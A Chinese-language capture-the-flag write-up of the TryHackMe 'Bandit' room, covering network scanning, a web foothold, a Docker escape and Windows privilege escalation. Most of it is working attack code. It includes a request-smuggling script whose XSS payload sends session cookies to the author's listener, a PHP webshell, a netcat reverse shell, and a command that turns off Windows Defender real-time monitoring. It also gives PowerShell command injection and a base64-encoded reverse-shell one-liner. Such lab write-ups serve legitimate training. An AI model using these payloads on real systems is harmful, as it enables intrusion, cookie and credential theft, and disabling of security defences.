打靶记录(六八)之THMBandit

主机发现

nmap -sn 10.200.130.0/24               
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:05 UTC
Nmap scan report for ip-10-200-130-10.eu-west-1.compute.internal (10.200.130.10)
Host is up (0.0015s latency).
Nmap scan report for ip-10-200-130-101.eu-west-1.compute.internal (10.200.130.101)
Host is up (0.0046s latency).
Nmap scan report for ip-10-200-130-102.eu-west-1.compute.internal (10.200.130.102)
Host is up (0.0046s latency).
Nmap scan report for ip-10-200-130-103.eu-west-1.compute.internal (10.200.130.103)
Host is up (0.0018s latency).
Nmap scan report for ip-10-200-130-104.eu-west-1.compute.internal (10.200.130.104)
Host is up (0.0046s latency).
Nmap scan report for ip-10-200-130-105.eu-west-1.compute.internal (10.200.130.105)
Host is up (0.0019s latency).
Nmap scan report for ip-10-200-130-106.eu-west-1.compute.internal (10.200.130.106)
Host is up (0.0042s latency).
Nmap scan report for ip-10-200-130-107.eu-west-1.compute.internal (10.200.130.107)
Host is up (0.0086s latency).
Nmap scan report for ip-10-200-130-108.eu-west-1.compute.internal (10.200.130.108)
Host is up (0.051s latency).
Nmap scan report for ip-10-200-130-109.eu-west-1.compute.internal (10.200.130.109)
Host is up (0.051s latency).
Nmap scan report for ip-10-200-130-110.eu-west-1.compute.internal (10.200.130.110)
Host is up (0.051s latency).
Nmap scan report for ip-10-200-130-250.eu-west-1.compute.internal (10.200.130.250)
Host is up (0.0014s latency).
Nmap done: 256 IP addresses (12 hosts up) scanned in 3.41 seconds

端口扫描

nmap --min-rate=10000 -p- 10.200.130.10
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:04 UTC
Warning: 10.200.130.10 giving up on port because retransmission cap hit (10).
Nmap scan report for ip-10-200-130-10.eu-west-1.compute.internal (10.200.130.10)
Host is up (0.0037s latency).
Not shown: 65444 closed tcp ports (reset), 77 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49680/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 14.76 seconds

nmap -sT -sV -sC -O -p135,139,445,3389,5985,47001,49664,49665,49666,49667,49668,49670,49671,49680 10.200.130.10 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:07 UTC
Nmap scan report for ip-10-200-130-10.eu-west-1.compute.internal (10.200.130.10)
Host is up (0.0026s latency).                                                                                                 
                                                                                                                              
PORT      STATE SERVICE       VERSION                                                                                         
135/tcp   open  msrpc         Microsoft Windows RPC                                                                           
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                   
445/tcp   open  microsoft-ds?                                                                                                 
3389/tcp  open  ms-wbt-server Microsoft Terminal Services                                                                     
| ssl-cert: Subject: commonName=EC2AMAZ-A6S61FR                                                                               
| Not valid before: 2023-12-08T11:01:40                                                                                       
|_Not valid after:  2024-06-08T11:01:40                                                                                       
|_ssl-date: 2023-12-11T05:09:04+00:00; -1s from scanner time.                                                                 
| rdp-ntlm-info:                                                                                                              
|   Target_Name: EC2AMAZ-A6S61FR
|   NetBIOS_Domain_Name: EC2AMAZ-A6S61FR
|   NetBIOS_Computer_Name: EC2AMAZ-A6S61FR
|   DNS_Domain_Name: EC2AMAZ-A6S61FR
|   DNS_Computer_Name: EC2AMAZ-A6S61FR
|   Product_Version: 10.0.17763
|_  System_Time: 2023-12-11T05:08:56+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows 10 1709 - 1909 (92%), Microsoft Windows Longhorn (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows Server 2016 (90%), Microsoft Windows 10 1703 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2023-12-11T05:08:59
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.73 seconds

房间提示让我们ssh到.250的主机

一通操作之后告诉我们入口是10.200.130.110，并且添加hosts:bandit.escape

nmap --min-rate=10000 -p- 10.200.130.110                                                                      
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 05:19 UTC
Nmap scan report for ip-10-200-130-109.eu-west-1.compute.internal (10.200.130.110)
Host is up (0.039s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
631/tcp  open  ipp
8002/tcp open  teradataordbms

Nmap done: 1 IP address (1 host up) scanned in 5.52 seconds

nmap -sT -sV -sC -O -p22,80,631,8002 10.200.130.110                                                            
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 10:02 UTC
Nmap scan report for ip-10-200-130-110.eu-west-1.compute.internal (10.200.130.110)
Host is up (0.0021s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8b3aac8362c717eea4039cc79e8b76cf (RSA)
|   256 6f46f5662b04c2d76d725369911fca6d (ECDSA)
|_  256 4feb8ab69f8df6a55faf6d83f0fbf40e (ED25519)
80/tcp   open  http-proxy      Apache Traffic Server 7.1.1
|_http-server-header: ATS/7.1.1
|_http-title: Not Found on Accelerator
631/tcp  open  ipp             CUPS 2.4
|_http-title: Bad Request - CUPS v2.4.5
|_http-server-header: CUPS/2.4 IPP/2.1
8002/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: login.php
| hadoop-tasktracker-info: 
|_  Logs: login.php
|_http-title: BANDIT
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.25 seconds

Getshell

就8002端口开了个web服务，扫一下目录看看

feroxbuster -u http://bandit.escape/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://bandit.escape/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       52l      224w     3302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                     
404      GET        1l        3w       16c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                     
301      GET        7l       11w      162c http://bandit.escape/templates => http://bandit.escape/templates/
200      GET        7l      435w    36868c http://bandit.escape/templates/bootstrap.min.js
200      GET        6l     1415w    95992c http://bandit.escape/templates/jquery.min.js
200      GET        6l      567w    23409c http://bandit.escape/templates/bootstrap-theme.min.css
200      GET        6l     1432w   121260c http://bandit.escape/templates/bootstrap.min.css
200      GET       57l      204w     2315c http://bandit.escape/login.php
301      GET        7l       11w      162c http://bandit.escape/uploads => http://bandit.escape/uploads/
301      GET        7l       11w      162c http://bandit.escape/public => http://bandit.escape/public/
200      GET       25l      110w      960c http://bandit.escape/templates/header.php
302      GET        0l        0w        0c http://bandit.escape/upload.php => login.php
200      GET        7l       35w      284c http://bandit.escape/templates/footer.php
401      GET        1l        2w       14c http://bandit.escape/api.php
302      GET        0l        0w        0c http://bandit.escape/logout.php => index.php
301      GET        7l       11w      162c http://bandit.escape/uploads/backup => http://bandit.escape/uploads/backup/
200      GET        0l        0w        0c http://bandit.escape/auth.php
200      GET       21l      170w     1074c http://bandit.escape/LICENSE
[####################] - 20m  1102745/1102745 0s      found:16      errors:0      
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_bandit_escape_-1702296898.state ...
[####################] - 20m  1102745/1102745 0s      found:16      errors:0      
[################>---] - 20m   183190/220546  155/s   http://bandit.escape/ 
[################>---] - 20m   183040/220546  155/s   http://bandit.escape/templates/ 
[################>---] - 20m   182929/220546  154/s   http://bandit.escape/uploads/ 
[################>---] - 20m   182899/220546  154/s   http://bandit.escape/public/ 
[################>---] - 20m   181294/220546  154/s   http://bandit.escape/uploads/backup/ 
[--------------------] - 0s         0/220546  -       http://bandit.escape/templates/bootstrap.min.js 

发现也都是没有权限访问,也许是要登录了，但是登陆界面是有点奇怪的，也许可以XSS来获取cookies

看一下搜索界面的源码，直接引号和右尖括号闭合语句再XSS

"><script>alert('XSS');</script>

然后成功地弹窗了！但是似乎劫持不了管理员的cookies，因为没有交互

apache traffic server好像是一个代理服务器？

https://portswigger.net/web-security/request-smuggling

似乎可以用HTTP请求走私攻击，并且7.1.1版本是可以利用的

先开启一个监听

nc -vlnp 8002

写一个python脚本来不断发起get请求，还是劫持cookie,原理暂时还不是很懂先抄(

import requests

url = "http://bandit.escape/"
body = f"""0

GET /?filter=a"/><script>document.write('<img+src%3d"http%3a//10.50.127.157%3a8002/test.gif%3fcookie%3d'+%2b+document.cookie+%2b+'"+/>')</script> HTTP/1.1
Whaterever:""".replace('\n','\r\n')

headers = {
        "Content-Length":str(len(body)),
        "Transfer-Encoding": "chunked",
        }

while True:
    r = requests.get(url,headers=headers,data=body)

成功劫持到了:d6ec7d2d2a88165d7a967f9fab4af897,停止脚本，更换cookie。发现可以访问upload.php了

随便上传了一个提示文件太大了。试着上传一个一句话木马，竟然也提示太大了，阿哲

然后也是找到了更简洁的一句话：

<?= `$_GET[1]`?>

然后抓包把文件名后缀改成.php，上传成功！

来到根目录，发现我们上传的图片显示了(我上传了shell.php和shell.png)（虽然是一串字符加.png)因为是PHP所以无法显示。前面那一串是文件名如:shell.png的md5加密。而且复制图片名称，能在根目录直接访问，也就是说上传的目录就是在根目录。那么猜测，我们的shell.php的文件名就是

echo -n "shell.php"|md5sum

访问，可以命令执行，那么做一个反弹shell

nc%2010.50.127.157%201234%20-e%20/bin/sh

完美

以防万一，转移到msf当中

横向移动

然后不出意外又是在docker当中

在/app目录中找一些敏感文件吧

在auth.php中找到一对凭证

safeadmin/HardcodedMeansUnguessableRight

应该是用来登录api.php的

meterpreter > ipcofnig
[-] Unknown command: ipcofnig
meterpreter > ipconfig

Interface  1
============

Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0


Interface  5
============

Name         : eth0
Hardware MAC : 02:42:ac:12:00:02
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 172.18.0.2
IPv4 Netmask : 255.255.0.0

好吧，既然我们已经拿到shell了，再登陆api.php也没有什么意义了。

本来是想扫描一下子网的

但是发现SSH可以直接密码复用，那么就直接docker逃逸了

发现我们有所有权限啊，

查看/etc/hosts,有这个:10.200.130.10 bandit.corp 添加hosts

而且我们是能ping通的，也就是一开始我们扫描的那台windows机器

不过预感告诉我需要在/root目录找一些敏感文件

在/home/ubuntu目录有许多用于PSSession的程序，似乎是用来远程连接的

好吧，看了下WP。在/home/ubuntu/.local/share/powershell/PSReadLine下面本应该有一个ConsoleHost_history.txt的，但是这个机器上并没有不知道为什么，也许因为是共享靶机被人恶作剧删掉了(

总之他的内容应该是:

$ClearPassword = "Passw0rd"

$SecurePass = ConvertTo-SecureString $ClearPassword -AsPlainText -Force

$credential = New-Object System.Management.Automation.PSCredential("safeuserHelpDesk", $SecurePass)

Enter-PSSession -ComputerName bandit.corp -Credential $credential -ConfigurationName testHelpDesksafe -Authentication Negotiate

我们可以输入pwsh来在linux上使用powershell，然后分别输入上面这4行,

唔，我们拿到了Windows那台机器的普通权限。但是似乎我们很多命令都执行不了啊

Get-Command查看一下能使用运行什么命令

提权

Get-ServicesApplication似乎并不是一个标准的内置的命令

Get-Command -ShowCommandInfo Get-ServicesApplication

Name          : Get-ServicesApplication
ModuleName    : 
Module        : @{Name=}
CommandType   : Function
Definition    : 
                            param($Filter="Parameters")
                            $escapedInput = $Status -replace "'", "''"
                            Invoke-Expression "Get-Service | Select-Object -Property Name,$Filter"

[Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory()

ParameterSets : {@{Name=__AllParameterSets; IsDefault=False; Parameters=System.Management.Automation.PSObject[]}}

我们似乎可以执行任意命令,像是这样：

Get-ServicesApplication -Filter '$(whoami /all)'

我们使用著名的nishang中的Invoke-PowerShellTcpOneLine.ps1来反弹shell,脚本稍作更改:

$client = New-Object System.Net.Sockets.TCPClient('10.50.127.157',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

cat Invoke-PowerShellTcpOneLine.ps1| iconv -t utf-16le | base64 -w0
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4ANQAwAC4AMQAyADcALgAxADUANwAnACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAJwA+ACAAJwA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQAKAAoA 

但是我们需要先关闭一下防病毒

echo 'Set-MpPreference -DisableRealtimeMonitoring $true' | iconv -t utf-16le | base64 -w0

Get-ServicesApplication -Filter '$(powershell -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQAKAA==)'

我测都已经拿到shell了tmd attackbox时间到了我的shell啊!我测你们码

总之最后

Get-ServicesApplication -Filter '$(powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4ANQAwAC4AMQAyADcALgAxADUANwAnACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAJwA+ACAAJwA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQAKAAoA)'

提权成功

碎碎念

这个房间真的挺难的哎，但不是很清楚为什么要设计成共享靶机，服了。最初的getshell漏洞利用也是挺难的，提权那块也挺难的，总之挺难的。好好学下powershell(这句话是不是好久之前就说过)